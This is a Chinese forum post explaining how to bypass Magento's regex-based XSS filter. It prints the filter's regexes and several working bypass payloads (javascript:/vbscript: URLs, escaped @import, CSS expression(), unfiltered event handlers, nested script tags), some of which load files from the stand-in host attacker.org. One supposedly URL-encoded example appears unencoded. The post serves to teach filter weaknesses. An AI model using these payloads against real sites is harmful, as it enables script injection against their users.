搜索
查看: 582|回复: 0

XSS过滤器Bypass的一些姿势

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-2-15 16:37:38 | 显示全部楼层 |阅读模式

[/url]

XSS 攻击是一种攻击者将 JavaScript 代码注入到用户运行页面中的攻击。为了避免这种攻击,一些应用会尝试从用户输入中移除 JavaScript 代码,但这很难完全实现。在本文中会先展示一些尝试过滤 JavaScript 的代码,并随后给出其绕过方法。

以一个网上商城应用 [url=https://magento.com/]Magento 中的过滤类 Mage_Core_Model_Input_Filter_MaliciousCode 为例,部分代码如下:

  1. protected $_expressions = array(
  2.     '/(\/\*.*\*\/)/Us',
  3.     '/(\t)/',
  4.     '/(javascript\s*:)/Usi',
  5.     '/(@import)/Usi',
  6.     '/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis',
  7.     '/(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup|onload|onunload|onerror)=[^<]*(?=\>)/Uis',
  8.     '/<\/?(script|meta|link|frame|iframe).*>/Uis',
  9.     '/src=[^<]*base64[^<]*(?=\>)/Uis',
  10. );

  11. function filter($value) {
  12.     return preg_replace($this->_expressions, '', $value);
  13. }
复制代码

数组 $_expressions 中包含一系列用于过滤的正则表达式,然后通过使用 preg_replace 函数进行恶意代码的过滤。所以当尝试输入 <script>foo</script> 时,两个标签都会被移除而只剩下 foo。

下面我们来看一下一些绕过的方法。我们的目标是利用一些 HTML 来执行 JavaScript,上述一些正则表达式是为了过滤如下:


  1. 过滤的正则        可能的利用
  2. (javascript\s*:)        <a href="javascript:alert('xss')">
  3. @import        @import url(http://attacker.org/malicious.css)
  4. style=…        <div style="color: expression(alert('XSS'))">
  5. <script…        <script>alert("XSS")</script>
  6. ondblclick|onclick|…        
复制代码

Javascript URL

链接标签里可以通过在 URL 中使用 javascript:… 来执行 JavaScript:

  1. <a href="javascript:alert('test')">link</a>
复制代码

上面的过滤会从代码中移除 javascript:,所以我们不能直接这么写代码。但我们可以尝试改变 javascript:的写法,使它依旧可以被浏览器执行但又不匹配正则表达式。首先来尝试下 URL 编码:

  1. <a href="javascript:alert('xss')">link</a>
复制代码

上面这段代码不匹配正则表达式,但是浏览器依旧会执行它,因为浏览器会首先进行 URL 解码操作。

另外,我们还可以使用 VBScript,虽然它在 IE11 中被禁用了,但依旧可以运行在旧版本的 IE 或者启用兼容模式的 IE11 上。我们可以使用类似上面 JavaScript 的方式来插入 VBScript 代码:

  1. <a href='vbscript:MsgBox("XSS")'>link</a>
复制代码


CSS import

IE 浏览器支持在 CSS 中扩展 JavaScript,这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的,因为攻击者现在可以在原始页面中执行 JavaScript 代码了。

  1. <style>@import url("http://attacker.org/malicious.css");</style>
复制代码

malicious.css:

  1. body {    color: expression(alert('XSS'));}
复制代码

为了绕过对 @import 的过滤,可以在 CSS 中使用反斜杠进行绕过:

  1. <style>@imp\ort url("http://attacker.org/malicious.css");</style>
复制代码

IE 浏览器会接受反斜杠,但是我们绕过了过滤器。

行内样式(Inline style)

我们同样可以在行内样式里利用 IE 浏览器支持的动态特性:

  1. <div style="color: expression(alert('XSS'))">
复制代码

过滤器会检查关键字 style,随后跟随的不能是 <,在随后是 expression:

  1. /style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis
复制代码

所以,让我们需要把 < 放到其他地方:

  1. <div style="color: '<'; color: expression(alert('XSS'))">
复制代码

这就绕过了过滤器,同时也是一个有效的 CSS。尽管 < 不是一个有效的颜色,但其他部分都是可以运行的。

JavaScript 事件

我们可以像如下这样在元素中定义 JavaScript 事件:

  1. <div onclick="alert('xss')">
复制代码

这个 JavaScript 代码当有人点击它后就会被执行,同时还有其他事件如页面加载或移动鼠标都可以触发这些事件。绝大部分的时间都被过滤器所移除了,但是依旧还有少量事件没有被过滤,例如,onmouseenter 事件:

  1. <div onmouseenter="alert('xss')">
复制代码

当用户鼠标移动到 div 上时就会触发我们的代码。

另一个绕过的办法就是在属性和= 之间插入一个空格。Magento 在新版中依旧修复了这一问题。

  1. <div onclick ="alert('xss')">
复制代码

Script 标签

Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本:

  1. <script>alert("XSS")</script><script src="http://attacker.org/malicious.js"></script>
复制代码


而我们的过滤器移除了所有的 <script> 标签。然而,它只进行一次移除操作,所以我们希望在进行移除操作后保留下我们的目标代码:

  1. <scr<script>ipt>alert("XSS")</scr<script>ipt>
复制代码


过滤器会移除两个 <script> 标签,而余下的代码正是我们所希望得到的。事实上,这种嵌套的方法可以用来绕过所有基于正则表达式的过滤。

总结

尽管过滤器试图尽可能的阻止脚本注入,但我们还是发现了绕过它们的方法。要创建一个防止 XSS 攻击的过滤器是相当不容易的,需要同时考虑多类型的编码和一些不同浏览器的特性。这就使得它对开发人员来说非常困难,但是对攻击者来说却很容易。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表